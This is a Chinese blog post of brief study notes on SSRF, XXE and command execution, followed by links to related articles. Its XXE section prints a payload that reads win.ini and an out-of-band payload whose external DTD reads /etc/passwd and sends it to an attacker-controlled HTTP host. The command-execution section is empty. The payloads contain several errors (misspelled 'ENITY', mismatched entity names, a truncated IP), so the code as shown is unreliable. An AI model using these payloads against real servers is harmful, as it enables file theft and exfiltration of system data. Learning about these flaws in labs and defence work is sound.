WEB系列(五)-----------SSRF/XXE/命令执行

最新推荐文章于 2024-04-11 17:51:56 发布
最新推荐文章于 2024-04-11 17:51:56 发布
阅读量590 收藏 1
点赞数
分类专栏: WEB 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41748164/article/details/106722914
版权

SSRF

SSRF(server-site request firery,服务端请求伪造) 是一种构造请求,由服务端发起请求的安全漏洞。与CSRF不同的是发起请求的对象不同。
成因:服务端提供了从其他服务器获取数据的功能,但没有对内网目标地址做过滤与限制。
产生ssrf漏洞的函数

  1. file_get_content()
  2. fsockopen()
  3. curl_exec()

XXE

XML DTD

DTD声明类型
内部声明
外部声明
DTD数据类型:PCDATA:被解析的字符数据
CDATA:不会被解析的文本
DTD实体
内部实体
外部实体

XML注入原理(XXE)

应用解析XML输入时,没有禁止外部实体的加载,导致可加载的恶意外部文件,造成文件读取,命令执行,内网端口扫描,攻击内网网站,发起DOS攻击等危害。
触发点往往是可以上传XML文档的位置。

  1. file_get_contents()
  2. php://input
  3. simplexml_load_string
    payload(回显 )
<?xml version='1.0' encoding="utf-8">
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENITY xxe SYSTEM "file:///C:/Windows/win.ini">]>
<root>
<name>&xxe;</name>
</root>

请求xml

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://192.168.1.103/test.dtd">
<foo>&e1;</foo>

test.dtd
<!ENTITY %p1 SYSTEM "file:///etc/passwd">
<!ENTITY %p2 "<!ENTITY E1 system 'http://192.168.103/test.php?con=%p1;'>">
%p2;

命令执行

weixinzjh
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
XXE 学习
weixin_47306547的博客
10-13 1717
XXE 是什么 XXE(XML External Entity Injection),即 XML 外部实体注入。 当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。 ...
Ueditor的XML文件上传导致存储型XSS(可以再试试xxe)和ssrf漏洞
weixin_50464560的博客
05-16 7358
UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSS - 『原创发布区』 - 大神论坛 |脱壳破解|易语言|病毒分析|www.dslt.tech 一、Ueditor最新版XML文件上传导致存储型XSS 测试版本:php版v1.4.3.3 下载地址:https://github.com/fex-team/ueditor复现步骤: 1.上传一个图片文件 2.然后buprsuit抓包拦截 3.将uploadimage类型改为uploadfile,并修改文件后...
SSRF其它绕过和攻击利用
最新发布
m0_73927535的博客
04-11 1067
构造数据 gopher提交数据:
XXE超详细讲解(都是纯纯的干货)
weixin_63688999的博客
07-06 941
XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础。XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。语法引用的外部实体,而非内部实体,那么uri中能写那些类型的外部实体呢?
Web漏洞之SSRF攻击汇总
小赵同学的博客
08-17 1246
SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 本文转发国光师傅的手把手带你用 SSRF 打穿内网。...
【技术分享】Python安全 - 从SSRF到命令执行惨案
Fly_鹏程万里
03-16 617
前两天遇到的一个问题,起源是在某个数据包里看到url=这个关键字,当时第一想到会不会有SSRF漏洞。 以前乌云上有很多从SSRF打到内网并执行命令的案例,比如有通过SSRF+S2-016漏洞漫游内网的案例,十分经典。不过当时拿到这个目标,我只是想确认一下他是不是SSRF漏洞,没想到后面找到了很多有趣的东西。截图不多(有的是后面补得),大家凑合看吧。 0x01 判断SSRF漏洞 目标exam...
awesome-web-security
04-28
为解决此问题,这里有一份精选的Web安全材料和资源列表,用于学习尖端的渗透技术,我强烈建议您阅读本文“ ” 请在之前阅读。 :rainbow: 想增强您的渗透能力吗? 我建议玩一些 。 如果您喜欢这个很棒的清单并想...
高级java笔试题-Web-Security-Note:记录一些常见的Web安全站点
06-03
命令执行 上传 CSRF 同源策略 文件包含 缓存投毒 提权 反序列化 代码审计 解析漏洞 PHP Thinkphp Python flask JAVA JS 指纹识别技术 Burp 插件 Fuzz Payload JWT HTTP Request Smuggling 协议 编码 其他 漏洞挖掘 ...
高级java笔试题-Web-Security-Learning:网络安全学习https://chybeta.github.io/2017/08
06-03
命令执行 文件包含 文件上传 / 解析漏洞 逻辑漏洞 其他漏洞 RPO(relative path overwrite) Web Cache redis 。 PHP相关 弱类型 随机数问题 伪协议 序列化 php mail header injection 其他 php代码审计 java-Web 反...
YourNextBugTip:Twitter Bug赏金技巧和窍门的集合
02-06
在网络安全领域,特别是参与Bug赏金计划的黑客和安全研究人员,常常需要掌握一系列特定的技巧和策略来发现并报告安全漏洞。"YourNextBugTip:Twitter Bug赏金技巧和窍门的集合" 提供了这样的资源,帮助研究人员提高...
SSRF综合靶场
hot_milk1的博客
02-20 1038
常见的SSRF的一些利用。
XXE漏洞利用技巧(XML注入):从XML到远程代码执行
墨痕诉清风的博客
10-12 4830
如今的 web 时代,是一个前后端分离的时代,有人说 MVC 就是前后端分离,但我觉得这种分离的并不彻底,后端还是要尝试去调用渲染类去控制前端的渲染,我所说的前后端分离是,后端 api 只负责接受约定好要传入的数据,然后经过一系列的黑盒运算,将得到结果以 json 格式返回给前端,前端只负责坐享其成,拿到数据json.decode 就行了(这里的后端可以是后台代码,也可以是外部的api 接口,这里的前端可以是传统意义的前端,也可以是后台代码)我们以存在 XXE 漏洞的服务器为我们探测内网的支点。...
SSRF深入各种高级实战用法
G0mini的博客
12-11 1070
SSRF深入各种高级实战用法
XML 基础知识 && XXE 漏洞原理解析及实验(基础篇)
Jinmindong
02-16 1159
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
XXE详解
qq_48904485的博客
03-22 5472
一、XML基础知识 1、XML简介: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML 和 HTML 为不同的目的而设计: XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 2、XML 语法 1)XML 声明文件的可选部分,如果存在需要放在文
通过实验了解SSRF
weixin_51692662的博客
10-18 1070
ssrf,pikachu
SSRF漏洞和XML
Hacker0830的博客
04-06 137
SSRF(Server-Side R equest Forgery),即服务器请求伪造,是一种由攻击者构造形成由服务器发起请求的一个安全漏洞。XML指可扩展标记语言,被设计为传输和存储数据,xml文档包括xml声明、DTD文档类型定义、文档元素、其焦点是数据的内容,其把数据从HMTL分离,是独立于软件和硬件的信息传输工具。DTD全称Document Type Definition,它是文档类型定义,其中规定XML文档中的元素、属性、标记、文档中的实体及其相互关系。DTD为XML文档结构制定了一套规则。
upload-labs靶场1-21通关
08-17
3. Level 3 - XXE漏洞:在上传的 XML 文件中尝试触发外部实体注入。 4. Level 4 - SQL注入漏洞:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 5. Level 5 - SSRF漏洞:尝试利用服务器端请求伪造...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值